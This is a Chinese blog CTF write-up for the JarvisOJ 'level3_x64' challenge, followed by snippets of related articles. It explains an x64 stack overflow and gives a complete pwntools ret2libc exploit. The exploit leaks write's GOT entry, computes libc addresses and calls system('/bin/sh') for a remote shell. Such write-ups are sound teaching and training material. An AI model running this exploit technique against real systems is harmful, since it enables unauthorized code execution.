JarvisOJ level3_x64

最新推荐文章于 2025-02-22 10:26:47 发布
原创 最新推荐文章于 2025-02-22 10:26:47 发布 · 1.1k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #栈溢出 #ROP #x64

该博客介绍一道x64程序栈溢出题,与level3大同小异。做本题前建议先写level2_x64。程序只开了NX保护,需找出所需地址,找齐gadget,因运行时rdx值足够,无需控制赋值,最后构造payload并给出完整exp。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这题和level3大同小异,只不过这一题是x64的程序

做这题之前,建议先写level2_x64。
拿到这题,我们首先查看保护:
在这里插入图片描述
程序只开了NX保护,好的。
根据做过level3的经验,我们先找出我们需要的地址(也可以用pwntools工具自动找):
vul()函数:
在这里插入图片描述
write()函数的plt地址:
在这里插入图片描述
之后我们找齐需要用的gadget:
在这里插入图片描述
但是我们并没有找到pop rdx ; ret,根据我们对write函数的了解,最后一个参数是用来控制长度的,所以,只要rdx寄存器的长度大于0x8就没有问题:
我们看一下:
在这里插入图片描述
我们通过GDB查看一下,运行时,rdx的值为0x200,这是完全足够的,我们就不需要控制他并对其赋值了。
做好以上准备之后,我们就可以来构造payload了,因为本题与level3的payload大同小异,在此就不详细讲构造过程了,直接给出完整的exp:

#!/usr/bin/env python
from pwn import *
p=remote('pwn2.jarvisoj.com','9883')
elf=ELF('./level3_x64')
libc=ELF('./libc-2.19.so')
write_plt=elf.symbols['write']
write_got=elf.got['write']
vul_addr=0x04005e6
pop_rdi_addr=0x04006b3
pop_rsi_addr=0x04006b1
payload='A'*0x80+'A'*8+p64(pop_rdi_addr)+p64(1)+p64(pop_rsi_addr)+p64(write_got)+p64(0x0)+p64(write_plt)+p64(vul_addr)
p.recvuntil('Input:\n')
p.send(payload)
write_addr=u64(p.recv(8))
print "write_addr="+hex(write_addr)
write_libc=libc.symbols['write']
libc_eee=write_addr-write_libc
sys_libc=libc.symbols['system']
sh_libc=libc.search('/bin/sh').next()
sys_addr=libc_eee+sys_libc
sh_addr=libc_eee+sh_libc
p.recvuntil('Input:\n')
payload1='A'*0x80+'A'*8+p64(pop_rdi_addr)+p64(sh_addr)+p64(sys_addr)+'A'*8
p.send(payload1)
p.interactive()

运行结果:
在这里插入图片描述

PLpa、
关注
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 586
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
(Jarvis Oj)(Pwn) level3_x64
Nothing
04-24 1027
(Jarvis Oj)(Pwn) level3_x64 这题是level3的64位版本,思路和32位版本一致,不同之处就是函数的参数传递,利用寄存器,于是构造rop链。写得脚本如下: from pwn import * ...
jarvisoj_level3_x64
m0sway的博客
11-26 668
jarvisoj_level3_x64 使用checksec查看: 只开启了栈不可执行,应该是jarvisoj_level3x64版本,直接放进IDA中看吧: 主函数中直接给出了漏洞函数,跟进查看: read()函数,存在栈溢出,和jarvisoj_level3的主要区别在栈上传参和寄存器传参。 exp: from pwn import * #start # r = process("../buu/jarvisoj_level3_x64") r = remote("node4.buuoj.cn",
[BUUCTF]PWN——jarvisoj_level3_x64
mcmuyanga的博客
11-04 1640
jarvisoj_level3_x64 附件 步骤: 例行检查,64位程序,开启了nx保护 试运行一下程序,看看大概的情况 64位ida载入,习惯性的检索字符串,没有发现可以直接利用的system,估计使用ret2libc的方法 从main函数开始看程序 function()函数 输入点buf明显的溢出漏洞,read之前已经调用过一个write函数了,可以利用它来泄露libc版本 利用过程 泄露libc版本 64位程序传参需要用到寄存器rdi,找一下设置rdi寄存器的指令 https://
jarvisoj_level6_x64(buuctf)--unlink利用
weixin_45427676的博客
04-14 749
这道题利用了unlink,unlink的利用原理我已经讲过了,以这个题来实列操作一下,加深对unlink利用的认识 查看保护机制 程序分析 在IDA查看一下主函数 可以看到程序中有四个功能函数,该程序是一个记事本程序,功能上基本就是添加记录、打印列出所有记录、编辑记录、删除记录。简单分析一下各函数的作用。 1、sub_400a49:创建记录索引表,具体就是分配一个大堆,堆里面存了各条记录存储区...
BUUCTF:jarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 1030
BUUCTF:jarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
Jarvis OJ level1
Kni9hT's Blog
11-08 649
要点:使用shellcraft.i386()来编写shellcode 和level0相比,本题没有system函数可以直接调用。 所以我们要发送shellcode来getshell 首先看一下开了哪些保护。(好吧,不出意料是全裸) 然后IDA里面看函数调用,main()函数先调用了vulnerable_function函数。 vulnerable_function: text:0804847B ...
[BUUCTF]PWN-jarvisoj_level4
红凳子的博客
04-07 614
[BUUCTF]PWN-jarvisoj_level4前言一、程序分析二、漏洞利用方法一:使用LibcSearcher寻找libc版本方法二:使用DynELF函数进行泄露 前言 在这篇文章中将学习到劫持read函数、使用LibcSearcher寻找libc版本和DynELF函数的使用 提示:以下是本篇文章正文内容,下面案例可供参考 一、程序分析 从中可以看出,32位程序,i386架构,开启了NX保护。 输入点在vulnerable_function里,read试图向长度0x88的地址空间写入0x10
Jarvis OJlevel3_x64_通用ROP
Jc
07-13 394
解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 2.代码审计 3.漏洞分析 1.程序无system和bin/sh,并且是个64位的,我们不能进行往栈里面写入数据 2.64位汇编 当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样,...
jarvis oj level3_x64
发蝴蝶和大脑斧的博客
12-07 874
level3_x64里没有找到system函数,但给了libc.so文件,应该是和level3一样的想法。 先找到操作寄存器的地址,因为write需要3个参数,所以需要rdi,rsi,rdx。但我们搜索只找到了rdi和rsi。 0x00000000004006b3 : pop rdi ; ret 0x00000000004006b1 : pop rsi ; pop r15 ; ret 根据网上w...
[BUUCTF-pwn]——jarvisoj_level3_x64
Y_peak的博客
02-22 293
[BUUCTF-pwn]——jarvisoj_level3_x64 题目地址:https://buuoj.cn/challenges#jarvisoj_level3_x64 点击查看 write up 博主有点懒,不想写第二遍。 ????
BUUCTF(pwn)jarvisoj_level3_x64
半岛铁盒的博客
04-01 500
这道题是一道简单的rop类型的题目,跟之前做的题目有一些差异:( 这是64位的需要一些额外的操作 ) 64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。 这里我们使用 write 函数 来泄密 libc地址 ssize_t write(int fd,const void*buf,size_t count); 参数说明: f.
BUUCTF jarvisoj_level3_x64
最新发布
2401_88087539的博客
02-22 415
pwn新手小白,写完题后整理的一点点思路,有借鉴其他wp,有任何问题各位师傅可以提出,接收批评指正
BUUCTF--pwn--jarvisoj_level3_x64【ret2libc_64】
qq_73149934的博客
12-05 708
BUUCTF--pwn--jarvisoj_level3_x64
jarvisoj_level2
08-13
JarvisOJLevel2题目中,给出了三个关于解题的代码片段的引用。引用和都是给出了关于解题的代码,其中引用是关于x64架构的代码,引用是关于i386架构的代码。这些代码都是用于获取Shell的payload。而引用则是对这个题目的解题思路的说明。 具体来说,在这个题目中,程序调用了system函数,并且存在/bin/sh字符串。通过对return address进行覆盖,可以将程序的控制流引导到system函数,并将/bin/sh字符串作为参数传递给它,从而获取Shell。其中,payload中的一些关键地址和字符串的具体值需要根据具体题目的情况来确定。 需要注意的是,这个题目的具体实现可能与上述引用中的代码有所不同,因此需要根据实际情况进行调整。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [jarvisoj_level2_x64](https://blog.csdn.net/zip471642048/article/details/125448386)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [jarvisoj_level2](https://blog.csdn.net/m0_55086916/article/details/128089924)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值